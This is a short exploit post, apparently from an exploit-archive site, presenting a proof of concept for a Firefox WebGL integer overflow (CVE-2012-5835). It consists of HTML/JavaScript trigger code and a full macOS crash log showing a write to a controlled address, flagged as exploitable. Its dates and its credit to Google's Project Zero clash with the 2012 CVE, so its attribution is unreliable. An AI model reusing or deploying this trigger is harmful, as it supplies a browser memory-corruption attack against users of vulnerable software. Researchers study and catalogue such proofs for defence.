Mozilla Firefox WebGL Proof Of Concept
Posted on 18 February 2017
# Exploit Title: Integer overflow happens WebGL system in Mozila Firefox # Date: 15-02-2017 # Software Link: https://www.mozilla.org/en-US/firefox/new/ # Exploit Author: (Originally Found by Google Project 0 team)Bikash Dash #Tested On:MAC OS x86 # Website: http://vulnerableghost.com/ # CVE: CVE-2012-5835 # Category: webapps(Mozila) <html> <head> <script> gl=document.createElement('canvas').getContext('experimental-webgl') var buf = gl.createBuffer() gl.bindBuffer(gl.ARRAY_BUFFER, buf) var magic = 0x12345678 gl.bufferData(gl.ARRAY_BUFFER, new Uint8Array(magic+1), gl.STATIC_DRAW) gl.bufferData(gl.ARRAY_BUFFER, Math.pow(2, 32), gl.STATIC_DRAW) gl.bufferSubData(gl.ARRAY_BUFFER, magic, new Uint8Array(1)) </script> </head> </html> Crash Information: exception=EXC_BAD_ACCESS:signal=11:is_exploitable=yes:instruction_disassembly=movb %al,(%rdi):instruction_address=0x00007fff92c82a41:access_type=write:access_address=0x0000000012345678: Crash accessing invalid address. Consider running it again with libgmalloc(3) to see if the log changes. Test case was b291.html Process: firefox [3732] Path: /Applications/Firefox.app/Contents/MacOS/firefox Identifier: firefox Version: ??? (???) Code Type: X86-64 (Native) Parent Process: exc_handler [3731] Date/Time: 2017-02-15 10:44:52.818 +0300 OS Version: Mac OS X 10.8.1 (12B19) Report Version: 9 Crashed Thread: 0 Dispatch queue: com.apple.main-thread Exception Type: EXC_BAD_ACCESS (SIGSEGV) Exception Codes: KERN_INVALID_ADDRESS at 0x0000000012345678 Thread 0 Crashed:: Dispatch queue: com.apple.main-thread 0 libsystem_c.dylib 0x00007fff92c82a41 memmove$VARIANT$sse42 + 57 1 GLEngine 0x000000010cfa9982 glBufferSubData_Exec + 856 2 XUL 0x00000001020df955 0x10111a000 + 16537941 3 XUL 0x000000010257424b 0x10111a000 + 21340747 4 XUL 0x0000000102564622 0x10111a000 + 21276194 5 XUL 0x0000000102573ae2 0x10111a000 + 21338850 6 XUL 0x0000000102573ce9 0x10111a000 + 21339369 7 XUL 0x0000000102573fe5 0x10111a000 + 21340133 8 XUL 0x00000001024f2d2d 0x10111a000 + 20811053 9 XUL 0x00000001024f2e5b JS_EvaluateUCScriptForPrincipalsVersionOrigin + 107 10 XUL 0x000000010182121d 0x10111a000 + 7369245 11 XUL 0x00000001015ef000 0x10111a000 + 5066752 12 XUL 0x00000001015f0538 0x10111a000 + 5072184 13 XUL 0x00000001015f117a 0x10111a000 + 5075322 14 XUL 0x00000001015ee4bd 0x10111a000 + 5063869 15 XUL 0x00000001019a41b6 0x10111a000 + 8954294 16 XUL 0x00000001019a6285 0x10111a000 + 8962693 17 XUL 0x00000001019aa94d 0x10111a000 + 8980813 18 XUL 0x00000001021324f3 0x10111a000 + 16876787 19 XUL 0x00000001020f1c0e 0x10111a000 + 16612366 20 XUL 0x0000000101f5b009 0x10111a000 + 14946313 21 XUL 0x0000000101f1f4bf 0x10111a000 + 14701759 22 com.apple.CoreFoundation 0x00007fff917fd841 __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ + 17 23 com.apple.CoreFoundation 0x00007fff917fd165 __CFRunLoopDoSources0 + 245 24 com.apple.CoreFoundation 0x00007fff918204e5 __CFRunLoopRun + 789 25 com.apple.CoreFoundation 0x00007fff9181fdd2 CFRunLoopRunSpecific + 290 26 com.apple.HIToolbox 0x00007fff8f6f3774 RunCurrentEventLoopInMode + 209 27 com.apple.HIToolbox 0x00007fff8f6f3512 ReceiveNextEventCommon + 356 28 com.apple.HIToolbox 0x00007fff8f6f33a3 BlockUntilNextEventMatchingListInMode + 62 29 com.apple.AppKit 0x00007fff96591fa3 _DPSNextEvent + 685 30 com.apple.AppKit 0x00007fff96591862 -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 128 31 XUL 0x0000000101f1e942 0x10111a000 + 14698818 32 com.apple.AppKit 0x00007fff96588c03 -[NSApplication run] + 517 33 XUL 0x0000000101f1ed2d 0x10111a000 + 14699821 34 XUL 0x0000000101d867b4 0x10111a000 + 13027252 35 XUL 0x0000000101121193 0x10111a000 + 29075 36 XUL 0x0000000101125fbb 0x10111a000 + 49083 37 XUL 0x00000001011264c3 XRE_main + 307 38 org.mozilla.firefox 0x0000000100001e15 0x100000000 + 7701 39 org.mozilla.firefox 0x0000000100001584 start + 52 Thread 0 crashed with X86 Thread State (64-bit): rax: 0xffffffff0b4f3400 rbx: 0x000000011506ac00 rcx: 0x0000000000000000 rdx: 0x0000000000000001 rdi: 0x0000000012345678 rsi: 0x0000000106e521d1 rbp: 0x00007fff5fbfb9d0 rsp: 0x00007fff5fbfb9d0 r8: 0x0000000000000000 r9: 0x00007fff5fbfb970 r10: 0x000000010a50c5b0 r11: 0x0000000012345678 r12: 0x0000000012345678 r13: 0x0000000113607b68 r14: 0x0000000113607b40 r15: 0x0000000000000001 rip: 0x00007fff92c82a41 rfl: 0x0000000000010206 cr2: 0x0000000012345678 Logical CPU: 2
